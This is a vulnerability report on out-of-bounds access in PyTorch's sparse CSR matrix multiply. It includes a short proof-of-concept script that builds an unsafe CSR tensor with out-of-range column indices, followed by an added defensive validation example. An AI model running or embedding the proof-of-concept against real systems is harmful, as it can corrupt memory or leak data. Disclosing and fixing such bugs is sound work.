Bug
Resolution: Obsolete
Vulnerability Type: Improper Validation of Array Index (CWE-129, CWE-823)
Location:
- File: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp
- Line: 60
Details:
Basic dimension mismatches are caught by runtime checks that verify sparse.size(1) == dense.size(0). However, the vulnerability exists in a more subtle form. The check validates tensor DIMENSIONS but not the VALUES within col_indices.
Bypass method:
1. Declare sparse tensor with size matching dense tensor dimensions
2. Insert col_indices values that exceed the declared size
3. The dimension check passes: sparse.size(1) == dense.size(0)
4. But col_indices contains values >= sparse.size(1)
There is no validation that col_indices.max() < sparse.size(1). This means attackers can create a sparse tensor with declared size (M, N) but col_indices containing values >= N. When this sparse tensor is multiplied with a dense tensor of size (N, K), the dimension check passes, but pointer arithmetic uses the actual col_indices values, causing OOB access.
Impact:
- Information disclosure via OOB reads
- Memory corruption via OOB writes
- Denial of service via segmentation faults
- Potential code execution with heap manipulation
- Can bypass basic dimension validation
- Exploitable through post-creation tensor modification
Exploit Code (first 50 lines):
#!/usr/bin/env python3
import torch
import sys
import warnings

def exploit_advanced_oob():
    print("ADVANCED CVE Exploit: Bypassing Validation in torch.sparse.mm()")
    print("Location: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp:60")
    warnings.filterwarnings('ignore')
    # Try to use unsafe tensor creation
    if hasattr(torch, '_sparse_csr_tensor_unsafe'):
        crow_indices = torch.tensor([0, 2, 4], dtype=torch.int64)
        col_indices = torch.tensor([0, 100, 1, 200], dtype=torch.int64)
        values = torch.tensor([1.0, 2.0, 3.0, 4.0], dtype=torch.float32)
        sparse_matrix = torch._sparse_csr_tensor_unsafe(
            crow_indices=crow_indices,
            col_indices=col_indices,
            values=values,
            size=(2, 10),
            dtype=torch.float32,
            device='cpu'
        )
        dense_matrix = torch.randn(10, 5, dtype=torch.float32, device='cpu')
        result = torch.sparse.mm(sparse_matrix, dense_matrix, reduce='sum')
Severity: High
CVSS Score: 8.0
Source File: /pytorch/results/exploit_cve3_advanced_oob.py
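The range check that Details says is missing (col_indices.max() < sparse.size(1)), as an added example that is not part of the original report and is not PyTorch code. It is a pure-Python model of CSR validation placed in front of a sum-reduce SpMM; the function names validate_csr and spmm_sum are hypothetical, and the inputs are constructed from the index arrays quoted in the report.

```python
# Added example: models the CSR index validation described in the report.
# validate_csr / spmm_sum are hypothetical names, not PyTorch APIs.

def validate_csr(crow_indices, col_indices, values, size):
    """Raise ValueError unless the CSR components are consistent with size."""
    rows, cols = size
    nnz = len(values)
    if len(col_indices) != nnz:
        raise ValueError("col_indices and values differ in length")
    if len(crow_indices) != rows + 1:
        raise ValueError("crow_indices must have rows + 1 entries")
    if crow_indices[0] != 0 or crow_indices[-1] != nnz:
        raise ValueError("crow_indices must start at 0 and end at nnz")
    if any(a > b for a, b in zip(crow_indices, crow_indices[1:])):
        raise ValueError("crow_indices must be non-decreasing")
    # The check a dimension comparison does not cover: every stored column
    # index must address a real row of the dense operand (negatives included).
    for pos, c in enumerate(col_indices):
        if not 0 <= c < cols:
            raise ValueError(f"col_indices[{pos}]={c} outside [0, {cols})")


def spmm_sum(crow_indices, col_indices, values, size, dense):
    """Reference sum-reduce SpMM that validates indices before using them."""
    rows, cols = size
    if len(dense) != cols:
        raise ValueError("sparse.size(1) != dense.size(0)")
    validate_csr(crow_indices, col_indices, values, size)
    k = len(dense[0]) if dense else 0
    out = [[0.0] * k for _ in range(rows)]
    for r in range(rows):
        for e in range(crow_indices[r], crow_indices[r + 1]):
            src = dense[col_indices[e]]  # index was range-checked above
            for j in range(k):
                out[r][j] += values[e] * src[j]
    return out


# Constructed inputs: the index arrays from the report and a well-formed variant.
CROW = [0, 2, 4]
BAD_COLS = [0, 100, 1, 200]
GOOD_COLS = [0, 9, 1, 2]
VALUES = [1.0, 2.0, 3.0, 4.0]
DENSE = [[float(i), 1.0] for i in range(10)]  # 10 x 2 dense operand

if __name__ == "__main__":
    print(spmm_sum(CROW, GOOD_COLS, VALUES, (2, 10), DENSE))
    try:
        spmm_sum(CROW, BAD_COLS, VALUES, (2, 10), DENSE)
    except ValueError as exc:
        print("rejected:", exc)
```

In PyTorch itself, the public torch.sparse_csr_tensor constructor accepts check_invariants=True to run this kind of validation when the tensor is built.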